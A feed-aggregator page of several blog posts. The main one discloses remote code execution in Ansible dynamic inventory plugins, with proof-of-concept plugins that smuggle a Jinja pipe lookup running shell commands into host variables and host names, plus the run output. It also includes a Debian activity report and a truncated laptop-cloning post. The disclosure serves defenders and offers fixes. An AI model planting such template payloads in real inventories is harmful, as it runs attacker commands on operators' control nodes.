<span id="cb1-33"></span></a><a href="https://www.joachim-breitner.de/blog/tag/English_feed.rss#cb1-33" tabindex="-1"> <span class="at">--ro-bind</span> /sys/dev/char /sys/dev/char <span class="dt">\</span>
<span id="cb1-34"></span></a><a href="https://www.joachim-breitner.de/blog/tag/English_feed.rss#cb1-34" tabindex="-1"> <span class="at">--ro-bind</span> /sys/devices/pci0000:00 /sys/devices/pci0000:00 <span class="dt">\</span>
<span id="cb1-35"></span></a><a href="https://www.joachim-breitner.de/blog/tag/English_feed.rss#cb1-35" tabindex="-1"> <span class="at">--ro-bind</span> /run/opengl-driver /run/opengl-driver <span class="dt">\</span>
<span id="cb1-36"></span></a><a href="https://www.joachim-breitner.de/blog/tag/English_feed.rss#cb1-36" tabindex="-1"><span class="dt">\</span>
<span id="cb1-37"></span></a><a href="https://www.joachim-breitner.de/blog/tag/English_feed.rss#cb1-37" tabindex="-1"> <span class="at">--ro-bind</span> /bin /bin <span class="dt">\</span>
<span id="cb1-38"></span></a><a href="https://www.joachim-breitner.de/blog/tag/English_feed.rss#cb1-38" tabindex="-1"> <span class="at">--ro-bind</span> /usr /usr <span class="dt">\</span>
<span id="cb1-39"></span></a><a href="https://www.joachim-breitner.de/blog/tag/English_feed.rss#cb1-39" tabindex="-1"> <span class="at">--ro-bind</span> /run/current-system /run/current-system <span class="dt">\</span>
<span id="cb1-40"></span></a><a href="https://www.joachim-breitner.de/blog/tag/English_feed.rss#cb1-40" tabindex="-1"> <span class="at">--ro-bind</span> /nix /nix <span class="dt">\</span>
<span id="cb1-41"></span></a><a href="https://www.joachim-breitner.de/blog/tag/English_feed.rss#cb1-41" tabindex="-1"> <span class="at">--ro-bind</span> /etc /etc <span class="dt">\</span>
<span id="cb1-42"></span></a><a href="https://www.joachim-breitner.de/blog/tag/English_feed.rss#cb1-42" tabindex="-1"> <span class="at">--ro-bind</span> /run/systemd/resolve/stub-resolv.conf /run/systemd/resolve/stub-resolv.conf <span class="dt">\</span>
<span id="cb1-43"></span></a><a href="https://www.joachim-breitner.de/blog/tag/English_feed.rss#cb1-43" tabindex="-1"><span class="dt">\</span>
<span id="cb1-44"></span></a><a href="https://www.joachim-breitner.de/blog/tag/English_feed.rss#cb1-44" tabindex="-1"> <span class="at">--bind</span> ~/.dev-home /home/jojo <span class="dt">\</span>
<span id="cb1-45"></span></a><a href="https://www.joachim-breitner.de/blog/tag/English_feed.rss#cb1-45" tabindex="-1"> <span class="at">--ro-bind</span> ~/.config/alacritty ~/.config/alacritty <span class="dt">\</span>
<span id="cb1-46"></span></a><a href="https://www.joachim-breitner.de/blog/tag/English_feed.rss#cb1-46" tabindex="-1"> <span class="at">--ro-bind</span> ~/.config/nvim ~/.config/nvim <span class="dt">\</span>
<span id="cb1-47"></span></a><a href="https://www.joachim-breitner.de/blog/tag/English_feed.rss#cb1-47" tabindex="-1"> <span class="at">--ro-bind</span> ~/.local/share/nvim ~/.local/share/nvim <span class="dt">\</span>
<span id="cb1-48"></span></a><a href="https://www.joachim-breitner.de/blog/tag/English_feed.rss#cb1-48" tabindex="-1"> <span class="at">--ro-bind</span> ~/.bin ~/.bin <span class="dt">\</span>
<span id="cb1-49"></span></a><a href="https://www.joachim-breitner.de/blog/tag/English_feed.rss#cb1-49" tabindex="-1"><span class="dt">\</span>
<span id="cb1-50"></span></a><a href="https://www.joachim-breitner.de/blog/tag/English_feed.rss#cb1-50" tabindex="-1"> <span class="at">--bind</span> /tmp/.X11-unix/X0 /tmp/.X11-unix/X0 <span class="dt">\</span>
<span id="cb1-51"></span></a><a href="https://www.joachim-breitner.de/blog/tag/English_feed.rss#cb1-51" tabindex="-1"> <span class="at">--bind</span> ~/.Xauthority ~/.Xauthority <span class="dt">\</span>
<span id="cb1-52"></span></a><a href="https://www.joachim-breitner.de/blog/tag/English_feed.rss#cb1-52" tabindex="-1"> <span class="at">--setenv</span> DISPLAY :0 <span class="dt">\</span>
<span id="cb1-53"></span></a><a href="https://www.joachim-breitner.de/blog/tag/English_feed.rss#cb1-53" tabindex="-1"><span class="dt">\</span>
<span id="cb1-54"></span></a><a href="https://www.joachim-breitner.de/blog/tag/English_feed.rss#cb1-54" tabindex="-1"> <span class="at">--setenv</span> container dev <span class="dt">\</span>
<span id="cb1-55"></span></a><a href="https://www.joachim-breitner.de/blog/tag/English_feed.rss#cb1-55" tabindex="-1"> <span class="st">"</span><span class="va">${extra</span><span class="op">[@]</span><span class="va">}</span><span class="st">"</span> <span class="dt">\</span>
<span id="cb1-56"></span></a><a href="https://www.joachim-breitner.de/blog/tag/English_feed.rss#cb1-56" tabindex="-1"> <span class="at">--</span> <span class="dt">\</span>
<span id="cb1-57"></span></a><a href="https://www.joachim-breitner.de/blog/tag/English_feed.rss#cb1-57" tabindex="-1"> <span class="st">"</span><span class="va">${cmd</span><span class="op">[@]</span><span class="va">}</span><span class="st">"</span></a></code></pre></div><a href="https://www.joachim-breitner.de/blog/tag/English_feed.rss#cb1-57" tabindex="-1">
</a></details>2024-03-11T20:39:58+00:00Joachim BreitnerEvgeni Golov: Remote Code Execution in Ansible dynamic inventory plugins
https://www.die-welt.net/2024/03/remote-code-execution-in-ansible-dynamic-inventory-plugins/
<p>I had reported this to Ansible a year ago (2023-02-23), but it seems this is considered expected behavior, so I am posting it here now.</p>
<h3>TL;DR</h3>
<p>Don't ever consume any data you got from an inventory if there is a chance somebody untrusted touched it.</p>
<h3>Inventory plugins</h3>
<p><a href="https://docs.ansible.com/ansible/latest/plugins/inventory.html#inventory-plugins">Inventory plugins</a> allow Ansible to pull inventory data from a variety of sources.
The most common ones are probably the ones fetching instances from clouds like <a href="https://docs.ansible.com/ansible/latest/collections/amazon/aws/aws_ec2_inventory.html">Amazon EC2</a>
and <a href="https://docs.ansible.com/ansible/latest/collections/hetzner/hcloud/hcloud_inventory.html">Hetzner Cloud</a> or the ones talking to tools like <a href="https://theforeman.org/">Foreman</a>.</p>
<p>For Ansible to function, an inventory needs to tell Ansible how to connect to a host (so e.g. a network address) and which groups the host belongs to (if any).
But it can also set any arbitrary variable for that host, which is often used to provide additional information about it.
These can be tags in EC2, parameters in Foreman, and other arbitrary data someone thought would be good to attach to that object.</p>
<p>And this is where things are getting interesting.
Somebody could add a comment to a host and that comment would be visible to you when you use the inventory with that host.
And if that comment contains a <a href="https://jinja.palletsprojects.com/">Jinja</a> expression, it might get executed.
And if that Jinja expression is using the <a href="https://docs.ansible.com/ansible/latest/plugins/lookup.html"><code>pipe</code> lookup</a>, it might get executed in your shell.</p>
<p>Let that sink in for a moment, and then we'll look at an example.</p>
<h3>Example inventory plugin</h3>
<div class="code"><pre class="code literal-block"><span class="kn">from</span> <span class="nn">ansible.plugins.inventory</span> <span class="kn">import</span> <span class="n">BaseInventoryPlugin</span>
<span class="k">class</span> <span class="nc">InventoryModule</span><span class="p">(</span><span class="n">BaseInventoryPlugin</span><span class="p">):</span>
    <span class="n">NAME</span> <span class="o">=</span> <span class="s1">'evgeni.inventoryrce.inventory'</span>
    <span class="k">def</span> <span class="nf">verify_file</span><span class="p">(</span><span class="bp">self</span><span class="p">,</span> <span class="n">path</span><span class="p">):</span>
        <span class="n">valid</span> <span class="o">=</span> <span class="kc">False</span>
        <span class="k">if</span> <span class="nb">super</span><span class="p">(</span><span class="n">InventoryModule</span><span class="p">,</span> <span class="bp">self</span><span class="p">)</span><span class="o">.</span><span class="n">verify_file</span><span class="p">(</span><span class="n">path</span><span class="p">):</span>
            <span class="k">if</span> <span class="n">path</span><span class="o">.</span><span class="n">endswith</span><span class="p">(</span><span class="s1">'evgeni.yml'</span><span class="p">):</span>
                <span class="n">valid</span> <span class="o">=</span> <span class="kc">True</span>
        <span class="k">return</span> <span class="n">valid</span>
    <span class="k">def</span> <span class="nf">parse</span><span class="p">(</span><span class="bp">self</span><span class="p">,</span> <span class="n">inventory</span><span class="p">,</span> <span class="n">loader</span><span class="p">,</span> <span class="n">path</span><span class="p">,</span> <span class="n">cache</span><span class="o">=</span><span class="kc">True</span><span class="p">):</span>
        <span class="nb">super</span><span class="p">(</span><span class="n">InventoryModule</span><span class="p">,</span> <span class="bp">self</span><span class="p">)</span><span class="o">.</span><span class="n">parse</span><span class="p">(</span><span class="n">inventory</span><span class="p">,</span> <span class="n">loader</span><span class="p">,</span> <span class="n">path</span><span class="p">,</span> <span class="n">cache</span><span class="p">)</span>
        <span class="bp">self</span><span class="o">.</span><span class="n">inventory</span><span class="o">.</span><span class="n">add_host</span><span class="p">(</span><span class="s1">'exploit.example.com'</span><span class="p">)</span>
        <span class="bp">self</span><span class="o">.</span><span class="n">inventory</span><span class="o">.</span><span class="n">set_variable</span><span class="p">(</span><span class="s1">'exploit.example.com'</span><span class="p">,</span> <span class="s1">'ansible_connection'</span><span class="p">,</span> <span class="s1">'local'</span><span class="p">)</span>
        <span class="bp">self</span><span class="o">.</span><span class="n">inventory</span><span class="o">.</span><span class="n">set_variable</span><span class="p">(</span><span class="s1">'exploit.example.com'</span><span class="p">,</span> <span class="s1">'something_funny'</span><span class="p">,</span> <span class="s1">'{{ lookup("pipe", "touch /tmp/hacked" ) }}'</span><span class="p">)</span>
</pre></div>
<p>The code is mostly copy & paste from the <a href="https://docs.ansible.com/ansible/latest/dev_guide/developing_inventory.html">Developing dynamic inventory</a> docs for Ansible and does three things:</p>
<ol>
<li>defines the plugin name as <code>evgeni.inventoryrce.inventory</code></li>
<li>accepts any config that ends with <code>evgeni.yml</code> (we'll need that to trigger the use of this inventory later)</li>
<li>adds an imaginary host <code>exploit.example.com</code> with <code>local</code> connection type and <code>something_funny</code> variable to the inventory</li>
</ol>
<p>In reality this would be talking to some API, iterating over hosts known to it, fetching their data, etc.
But the structure of the code would be very similar.</p>
<p>The crucial part is that if we have a string with a Jinja expression, we can set it as a variable for a host.</p>
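<p>To see why that matters, here is a toy stand-in for what the templar effectively does with such a string once it is rendered. This is plain Python, not Ansible internals: the regex, the <code>toy_template</code> name, and the marker file are all illustrative, but the mechanism (a pipe lookup turning into a shell invocation) mirrors the real behavior described above.</p>

```python
import os
import re
import subprocess
import tempfile

# Toy model of rendering a pipe lookup: find the expression and run its
# argument in a shell. Illustrative only -- not Ansible's real templar.
PIPE_LOOKUP = re.compile(r'\{\{\s*lookup\(\s*"pipe"\s*,\s*"([^"]*)"\s*\)\s*\}\}')

def toy_template(value: str) -> str:
    """Replace each pipe-lookup expression with the command's stdout."""
    def run(match):
        result = subprocess.run(match.group(1), shell=True,
                                capture_output=True, text=True)
        return result.stdout.strip()
    return PIPE_LOOKUP.sub(run, value)

# An attacker-controlled "comment": just a harmless string, until templated.
marker = os.path.join(tempfile.mkdtemp(), "hacked")
something_funny = '{{ lookup("pipe", "touch %s" ) }}' % marker

rendered = toy_template(something_funny)
print(repr(rendered))          # '' -- touch prints nothing
print(os.path.exists(marker))  # True -- but the command did run
```

<p>The rendered result is an empty string, exactly as in the <code>debug</code> output later in this post, while the side effect has already happened.</p>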
<h3>Using the example inventory plugin</h3>
<p>Now we install the collection containing this inventory plugin,
or rather write the code to <code>~/.ansible/collections/ansible_collections/evgeni/inventoryrce/plugins/inventory/inventory.py</code>
(or wherever your Ansible loads its collections from).</p>
<p>And we create a configuration file.
As there is nothing to configure, it can be empty and only needs to have the right filename: <code>touch inventory.evgeni.yml</code> is all you need.</p>
<p>If we now call <code>ansible-inventory</code>, we'll see our host and our variable present:</p>
<div class="code"><pre class="code literal-block"><span class="gp">% </span><span class="nv">ANSIBLE_INVENTORY_ENABLED</span><span class="o">=</span>evgeni.inventoryrce.inventory<span class="w"> </span>ansible-inventory<span class="w"> </span>-i<span class="w"> </span>inventory.evgeni.yml<span class="w"> </span>--list
<span class="go">{</span>
<span class="go"> "_meta": {</span>
<span class="go"> "hostvars": {</span>
<span class="go"> "exploit.example.com": {</span>
<span class="go"> "ansible_connection": "local",</span>
<span class="go"> "something_funny": "{{ lookup(\"pipe\", \"touch /tmp/hacked\" ) }}"</span>
<span class="go"> }</span>
<span class="go"> }</span>
<span class="go"> },</span>
<span class="go"> "all": {</span>
<span class="go"> "children": [</span>
<span class="go"> "ungrouped"</span>
<span class="go"> ]</span>
<span class="go"> },</span>
<span class="go"> "ungrouped": {</span>
<span class="go"> "hosts": [</span>
<span class="go"> "exploit.example.com"</span>
<span class="go"> ]</span>
<span class="go"> }</span>
<span class="go">}</span>
</pre></div>
<p>(<a href="https://docs.ansible.com/ansible/latest/reference_appendices/config.html#envvar-ANSIBLE_INVENTORY_ENABLED"><code>ANSIBLE_INVENTORY_ENABLED=evgeni.inventoryrce.inventory</code></a> is required to allow the use of our inventory plugin, as it's not in the default list.)</p>
<p>So far, nothing dangerous has happened.
The inventory got generated, the host is present, the funny variable is set, but it's still only a string.</p>
<h3>Executing a playbook, interpreting Jinja</h3>
<p>To execute the code we'd need to use the variable in a context where Jinja is used.
This could be a template where you actually use this variable, like a report where you print the comment the creator has added to a VM.</p>
<p>Or a <a href="https://docs.ansible.com/ansible/latest/collections/ansible/builtin/debug_module.html"><code>debug</code></a> task where you dump all variables of a host to analyze what's set.
Let's use that!</p>
<div class="code"><pre class="code literal-block"><span class="p p-Indicator">-</span><span class="w"> </span><span class="nt">hosts</span><span class="p">:</span><span class="w"> </span><span class="l l-Scalar l-Scalar-Plain">all</span>
<span class="w"> </span><span class="nt">tasks</span><span class="p">:</span>
<span class="w"> </span><span class="p p-Indicator">-</span><span class="w"> </span><span class="nt">name</span><span class="p">:</span><span class="w"> </span><span class="l l-Scalar l-Scalar-Plain">Display all variables/facts known for a host</span>
<span class="w"> </span><span class="nt">ansible.builtin.debug</span><span class="p">:</span>
<span class="w"> </span><span class="nt">var</span><span class="p">:</span><span class="w"> </span><span class="l l-Scalar l-Scalar-Plain">hostvars[inventory_hostname]</span>
</pre></div>
<p>This playbook looks totally innocent: run against all hosts and dump their hostvars using <code>debug</code>.
No mention of our funny variable.
Yet, when we execute it, we see:</p>
<div class="code"><pre class="code literal-block"><span class="gp">% </span><span class="nv">ANSIBLE_INVENTORY_ENABLED</span><span class="o">=</span>evgeni.inventoryrce.inventory<span class="w"> </span>ansible-playbook<span class="w"> </span>-i<span class="w"> </span>inventory.evgeni.yml<span class="w"> </span>test.yml
<span class="go">PLAY [all] ************************************************************************************************</span>
<span class="go">TASK [Gathering Facts] ************************************************************************************</span>
<span class="go">ok: [exploit.example.com]</span>
<span class="go">TASK [Display all variables/facts known for a host] *******************************************************</span>
<span class="go">ok: [exploit.example.com] => {</span>
<span class="go"> "hostvars[inventory_hostname]": {</span>
<span class="go"> "ansible_all_ipv4_addresses": [</span>
<span class="go"> "192.168.122.1"</span>
<span class="go"> ],</span>
<span class="go"> …</span>
<span class="go"> "something_funny": ""</span>
<span class="go"> }</span>
<span class="go">}</span>
<span class="go">PLAY RECAP *************************************************************************************************</span>
<span class="go">exploit.example.com : ok=2 changed=0 unreachable=0 failed=0 skipped=0 rescued=0 ignored=0 </span>
</pre></div>
<p>We got <em>all</em> variables dumped, as expected, but now <code>something_funny</code> is an empty string?
Jinja got executed: the expression was <code>{{ lookup("pipe", "touch /tmp/hacked" ) }}</code>, and <code>touch</code> does not print anything.
But it did create the file!</p>
<div class="code"><pre class="code literal-block"><span class="gp">% </span>ls<span class="w"> </span>-alh<span class="w"> </span>/tmp/hacked<span class="w"> </span>
<span class="go">-rw-r--r--. 1 evgeni evgeni 0 Mar 10 17:18 /tmp/hacked</span>
</pre></div>
<p>We just "hacked" the Ansible <a href="https://docs.ansible.com/ansible/latest/network/getting_started/basic_concepts.html#control-node">control node</a> (aka: your laptop),
as that's where <code>lookup</code> is executed.
It could also have used the <a href="https://docs.ansible.com/ansible/latest/collections/ansible/builtin/url_lookup.html"><code>url</code> lookup</a> to send the contents of your Ansible vault to some internet host.
Or connect to some VPN-secured system that should not be reachable from EC2/Hetzner/….</p>
<h3>Why is this possible?</h3>
<p>This happens because <a href="https://github.com/ansible/ansible/blob/56f31126ad1c69e5eda7b92c1fa15861f722af0e/lib/ansible/inventory/data.py#L245"><code>set_variable(entity, varname, value)</code></a> doesn't mark the values as unsafe and Ansible processes everything with Jinja in it.</p>
<p>In this very specific example, a possible fix would be to explicitly wrap the string in <a href="https://github.com/ansible/ansible/blob/stable-2.16/lib/ansible/utils/unsafe_proxy.py#L346-L363"><code>AnsibleUnsafeText</code> by using <code>wrap_var</code></a>:</p>
<div class="code"><pre class="code literal-block"><span class="kn">from</span> <span class="nn">ansible.utils.unsafe_proxy</span> <span class="kn">import</span> <span class="n">wrap_var</span>
<span class="err">…</span>
<span class="bp">self</span><span class="o">.</span><span class="n">inventory</span><span class="o">.</span><span class="n">set_variable</span><span class="p">(</span><span class="s1">'exploit.example.com'</span><span class="p">,</span> <span class="s1">'something_funny'</span><span class="p">,</span> <span class="n">wrap_var</span><span class="p">(</span><span class="s1">'{{ lookup("pipe", "touch /tmp/hacked" ) }}'</span><span class="p">))</span>
</pre></div>
<p>Which then gets rendered as a string when dumping the variables using <code>debug</code>:</p>
<div class="code"><pre class="code literal-block"><span class="go">"something_funny": "{{ lookup(\"pipe\", \"touch /tmp/hacked\" ) }}"</span>
</pre></div>
<p>But it seems inventories don't do this:</p>
<div class="code"><pre class="code literal-block"><span class="k">for</span> <span class="n">k</span><span class="p">,</span> <span class="n">v</span> <span class="ow">in</span> <span class="n">host_vars</span><span class="o">.</span><span class="n">items</span><span class="p">():</span>
    <span class="bp">self</span><span class="o">.</span><span class="n">inventory</span><span class="o">.</span><span class="n">set_variable</span><span class="p">(</span><span class="n">name</span><span class="p">,</span> <span class="n">k</span><span class="p">,</span> <span class="n">v</span><span class="p">)</span>
</pre></div>
<p>(<a href="https://github.com/ansible-collections/amazon.aws/blob/89ec6ba2ee7fae84eb1aae098da040eba4974c7d/plugins/inventory/aws_ec2.py#L762-L763">aws_ec2.py</a>)</p>
<div class="code"><pre class="code literal-block"><span class="k">for</span> <span class="n">key</span><span class="p">,</span> <span class="n">value</span> <span class="ow">in</span> <span class="n">hostvars</span><span class="o">.</span><span class="n">items</span><span class="p">():</span>
    <span class="bp">self</span><span class="o">.</span><span class="n">inventory</span><span class="o">.</span><span class="n">set_variable</span><span class="p">(</span><span class="n">hostname</span><span class="p">,</span> <span class="n">key</span><span class="p">,</span> <span class="n">value</span><span class="p">)</span>
</pre></div>
<p>(<a href="https://github.com/ansible-collections/hetzner.hcloud/blob/46717e2d6574b1e36db7bc73b54712f9270a2169/plugins/inventory/hcloud.py#L503-L504">hcloud.py</a>)</p>
<div class="code"><pre class="code literal-block"><span class="k">for</span> <span class="n">k</span><span class="p">,</span> <span class="n">v</span> <span class="ow">in</span> <span class="n">hostvars</span><span class="o">.</span><span class="n">items</span><span class="p">():</span>
    <span class="k">try</span><span class="p">:</span>
        <span class="bp">self</span><span class="o">.</span><span class="n">inventory</span><span class="o">.</span><span class="n">set_variable</span><span class="p">(</span><span class="n">host_name</span><span class="p">,</span> <span class="n">k</span><span class="p">,</span> <span class="n">v</span><span class="p">)</span>
    <span class="k">except</span> <span class="ne">ValueError</span> <span class="k">as</span> <span class="n">e</span><span class="p">:</span>
        <span class="bp">self</span><span class="o">.</span><span class="n">display</span><span class="o">.</span><span class="n">warning</span><span class="p">(</span><span class="s2">"Could not set host info hostvar for </span><span class="si">%s</span><span class="s2">, skipping </span><span class="si">%s</span><span class="s2">: </span><span class="si">%s</span><span class="s2">"</span> <span class="o">%</span> <span class="p">(</span><span class="n">host</span><span class="p">,</span> <span class="n">k</span><span class="p">,</span> <span class="n">to_text</span><span class="p">(</span><span class="n">e</span><span class="p">)))</span>
</pre></div>
<p>(<a href="https://github.com/theforeman/foreman-ansible-modules/blob/8ad32f166c3d1f8f4077dc3029b312c5b9dc534b/plugins/inventory/foreman.py#L516-L520">foreman.py</a>)</p>
<p>And honestly, I can totally understand that.
When developing an inventory, you do not expect to handle insecure input data.
You also expect the API to handle the data in a secure way by default.
But <code>set_variable</code> doesn't allow you to tag data as "safe" or "unsafe" easily, and data in Ansible defaults to "safe".</p>
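<p>A defensive plugin author can still wrap values themselves before calling <code>set_variable</code>. The sketch below mirrors the recursive shape of <code>wrap_var</code> in plain Python; in a real plugin you would import <code>wrap_var</code> from <code>ansible.utils.unsafe_proxy</code> instead, and the <code>UnsafeText</code> stand-in here only exists so the snippet runs without Ansible installed.</p>

```python
# Defensive sketch: mark every inventory-supplied string as unsafe before it
# reaches set_variable. UnsafeText is a minimal stand-in for Ansible's
# AnsibleUnsafeText; use ansible.utils.unsafe_proxy.wrap_var in real code.

class UnsafeText(str):
    """A str tagged as not-to-be-templated (stand-in for AnsibleUnsafeText)."""
    pass

def wrap_unsafe(value):
    """Recursively wrap strings inside containers, like wrap_var does."""
    if isinstance(value, str):
        return UnsafeText(value)
    if isinstance(value, dict):
        return {k: wrap_unsafe(v) for k, v in value.items()}
    if isinstance(value, (list, tuple, set)):
        return type(value)(wrap_unsafe(v) for v in value)
    return value  # ints, bools, None, ... carry no template payload

host_vars = {
    "comment": '{{ lookup("pipe", "touch /tmp/hacked") }}',
    "tags": ["prod", '{{ lookup("pipe", "id") }}'],
    "cpus": 4,
}

safe_vars = wrap_unsafe(host_vars)
# A plugin would then do: self.inventory.set_variable(name, k, safe_vars[k])
print(type(safe_vars["comment"]).__name__)  # UnsafeText
```

<p>With the values wrapped this way, the templar renders them as literal strings instead of evaluating them, as shown with <code>wrap_var</code> above.</p>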
<h3>Can something similar happen in other parts of Ansible?</h3>
<p>It certainly happened in the past that Jinja was abused in Ansible: <a href="https://bugzilla.redhat.com/CVE-2016-9587">CVE-2016-9587</a>, <a href="https://bugzilla.redhat.com/CVE-2017-7466">CVE-2017-7466</a>, <a href="https://bugzilla.redhat.com/CVE-2017-7481">CVE-2017-7481</a></p>
<p>But even if we only look at inventories, <a href="https://github.com/ansible/ansible/blob/56f31126ad1c69e5eda7b92c1fa15861f722af0e/lib/ansible/inventory/data.py#L191"><code>add_host(host)</code></a> can be abused in a similar way:</p>
<div class="code"><pre class="code literal-block"><span class="kn">from</span> <span class="nn">ansible.plugins.inventory</span> <span class="kn">import</span> <span class="n">BaseInventoryPlugin</span>
<span class="k">class</span> <span class="nc">InventoryModule</span><span class="p">(</span><span class="n">BaseInventoryPlugin</span><span class="p">):</span>
    <span class="n">NAME</span> <span class="o">=</span> <span class="s1">'evgeni.inventoryrce.inventory'</span>
    <span class="k">def</span> <span class="nf">verify_file</span><span class="p">(</span><span class="bp">self</span><span class="p">,</span> <span class="n">path</span><span class="p">):</span>
        <span class="n">valid</span> <span class="o">=</span> <span class="kc">False</span>
        <span class="k">if</span> <span class="nb">super</span><span class="p">(</span><span class="n">InventoryModule</span><span class="p">,</span> <span class="bp">self</span><span class="p">)</span><span class="o">.</span><span class="n">verify_file</span><span class="p">(</span><span class="n">path</span><span class="p">):</span>
            <span class="k">if</span> <span class="n">path</span><span class="o">.</span><span class="n">endswith</span><span class="p">(</span><span class="s1">'evgeni.yml'</span><span class="p">):</span>
                <span class="n">valid</span> <span class="o">=</span> <span class="kc">True</span>
        <span class="k">return</span> <span class="n">valid</span>
    <span class="k">def</span> <span class="nf">parse</span><span class="p">(</span><span class="bp">self</span><span class="p">,</span> <span class="n">inventory</span><span class="p">,</span> <span class="n">loader</span><span class="p">,</span> <span class="n">path</span><span class="p">,</span> <span class="n">cache</span><span class="o">=</span><span class="kc">True</span><span class="p">):</span>
        <span class="nb">super</span><span class="p">(</span><span class="n">InventoryModule</span><span class="p">,</span> <span class="bp">self</span><span class="p">)</span><span class="o">.</span><span class="n">parse</span><span class="p">(</span><span class="n">inventory</span><span class="p">,</span> <span class="n">loader</span><span class="p">,</span> <span class="n">path</span><span class="p">,</span> <span class="n">cache</span><span class="p">)</span>
        <span class="bp">self</span><span class="o">.</span><span class="n">inventory</span><span class="o">.</span><span class="n">add_host</span><span class="p">(</span><span class="s1">'lol{{ lookup("pipe", "touch /tmp/hacked-host" ) }}'</span><span class="p">)</span>
</pre></div>
<div class="code"><pre class="code literal-block"><span class="gp">% </span><span class="nv">ANSIBLE_INVENTORY_ENABLED</span><span class="o">=</span>evgeni.inventoryrce.inventory<span class="w"> </span>ansible-playbook<span class="w"> </span>-i<span class="w"> </span>inventory.evgeni.yml<span class="w"> </span>test.yml
<span class="go">PLAY [all] ************************************************************************************************</span>
<span class="go">TASK [Gathering Facts] ************************************************************************************</span>
<span class="go">fatal: [lol{{ lookup("pipe", "touch /tmp/hacked-host" ) }}]: UNREACHABLE! => {"changed": false, "msg": "Failed to connect to the host via ssh: ssh: Could not resolve hostname lol: No address associated with hostname", "unreachable": true}</span>
<span class="go">PLAY RECAP ************************************************************************************************</span>
<span class="go">lol{{ lookup("pipe", "touch /tmp/hacked-host" ) }} : ok=0 changed=0 unreachable=1 failed=0 skipped=0 rescued=0 ignored=0</span>
<span class="gp">% </span>ls<span class="w"> </span>-alh<span class="w"> </span>/tmp/hacked-host
<span class="go">-rw-r--r--. 1 evgeni evgeni 0 Mar 13 08:44 /tmp/hacked-host</span>
</pre></div>
<h3>Affected versions</h3>
<p>I've tried this on Ansible (core) 2.13.13 and 2.16.4.
I'd totally expect older versions to be affected too, but I have not verified that.</p>2024-03-11T20:00:00+00:00evgeniThorsten Alteholz: My Debian Activities in February 2024
http://blog.alteholz.eu/2024/03/my-debian-activities-in-february-2024/
<h3><strong>FTP master</strong></h3>
<p>This month I accepted 242 and rejected 42 packages. The overall number of packages that got accepted was 251.<br /><br />
This was just a short month and the weather outside was not really motivating. I hope it will be better in March.
</p><h3><strong>Debian LTS</strong></h3>
<p>This was my hundred and sixteenth month of work for the Debian LTS initiative, started by Raphael Hertzog at Freexian.</p>
<p>During my allocated time I uploaded:</p>
<ul><li>[<a href="https://www.debian.org/lts/security/2023/dla-3739-1">DLA 3739-1</a>] libjwt security update for one CVE to fix a constant-time-execution issue</li><li>[libjwt] upload to unstable</li><li>[<a href="https://bugs.debian.org/1064550">#1064550</a>] Bullseye PU bug for libjwt</li><li>[<a href="https://bugs.debian.org/1064551">#1064551</a>] Bookworm PU bug for libjwt</li><li>[<a href="https://bugs.debian.org/1064551">#1064551</a>] Bookworm PU bug for libjwt; upload after approval</li><li>[<a href="https://www.debian.org/lts/security/2023/dla-3741-1">DLA 3741-1</a>] engrampa security update for one CVE to fix a path traversal issue with CPIO archives</li><li>[<a href="https://bugs.debian.org/1060186">#1060186</a>] Bookworm PU-bug for libde265 was flagged for acceptance</li><li>[<a href="https://bugs.debian.org/1056935">#1056935</a>] Bullseye PU-bug for libde265 was flagged for acceptance</li></ul>
<p>I also started to work on <i>qtbase-opensource-src</i> (an update is needed for ELTS, so an LTS update seems to be appropriate as well, especially as there are postponed CVEs).</p>
<h3><strong>Debian ELTS</strong></h3>
<p>This month was the sixty-seventh ELTS month. During my allocated time I uploaded:</p>
<ul><li>[ELA-1047-1] bind9 security update for one CVE to fix a stack exhaustion issue in Jessie and Stretch</li></ul>
<p>The upload of <i>bind9</i> was a bit exciting, but all issues that occurred with the new upload workflow could be quickly fixed by Helmut and the packages finally reached their destination. I wonder why it is always me who stumbles upon special cases? This month I also worked on the Jessie and Stretch updates for <i>exim4</i>. I also started to work on an update for <i>qtbase-opensource-src</i> in Stretch (and LTS and other releases as well).</p>
<h3><strong>Debian Printing</strong></h3>
<p>This month I uploaded new upstream versions of:</p>
<ul><li>… <a href="https://tracker.debian.org/cpdb-libs">cpdb-libs</a></li></ul>
<p></p>
<p><strong>This work is generously funded by <a href="https://www.freexian.com">Freexian</a>!</strong></p>
<h3><strong>Debian Matomo</strong></h3>
<p>I started a new team <a href="https://qa.debian.org/developer.php?email=debian-matomo-maintainers%40alioth-lists.debian.net">debian-matomo-maintainers</a>. Within this team all Matomo-related packages will be handled. PHP PEAR or PECL packages shall still be maintained in their corresponding teams.</p>
<p>This month I uploaded:</p>
<ul><li>… <a href="https://tracker.debian.org/matomo-searchengine-and-social-list">matomo-searchengine-and-social-list</a></li><li>… <a href="https://tracker.debian.org/matomo-referrer-spam-list">matomo-referrer-spam-list</a></li><li>… <a href="https://tracker.debian.org/matomo-php-tracker">matomo-php-tracker</a></li><li>… <a href="https://tracker.debian.org/matomo-device-detector">matomo-device-detector</a></li><li>… <a href="https://tracker.debian.org/matomo-component-ini">matomo-component-ini</a></li></ul>
<p><strong>This work is generously funded by <a href="https://www.freexian.com">Freexian</a>!</strong></p>
<h3><strong>Debian Astro</strong></h3>
<p>This month I uploaded a new upstream version of:</p>
<ul><li>… <a href="https://tracker.debian.org/libahp-xc">libahp-xc</a></li></ul>
<h3><strong>Debian IoT</strong></h3>
<p>This month I uploaded new upstream versions of:</p>
<ul><li>… <a href="https://tracker.debian.org/pyicloud">libjwt</a> to fix a CVE</li></ul>2024-03-10T12:22:52+00:00alteholzVasudev Kamath: Cloning a laptop over NVME TCP
https://copyninja.in/blog/clone_laptop_nvmet.html
<p>Recently, I got a new laptop and had to set it up so I could start using it. But
I wasn't really in the mood to go through the same old steps which I had
explained in this <a class="reference external" href="https://copyninja.in/blog/live_install_debian.html">post earlier</a>. I was complaining about
this to my colleague, and there came the suggestion of why not copy the entire
disk to the new laptop. Though it sounded like an interesting idea to me, I had
my doubts, so here is what I told him in return.</p>
<ol class="arabic simple">
<li>I don't have the tools to open my old laptop and connect the new disk over
USB to my new laptop.</li>
<li>I use full disk encryption, and my old laptop has a 512GB disk, whereas the
new laptop has a 1TB NVME, and I'm not so familiar with resizing LUKS.</li>
</ol>
<p>He promptly suggested both could be done. For step 1, just expose the disk using
NVME over TCP, connect it over the network, and do a full disk copy; the
rest is pretty simple to achieve. In short, he suggested the following:</p>
<ol class="arabic simple">
<li>Export the disk using nvmet-tcp from the old laptop.</li>
<li>Do a disk copy to the new laptop.</li>
<li>Resize the partition to use the full 1TB.</li>
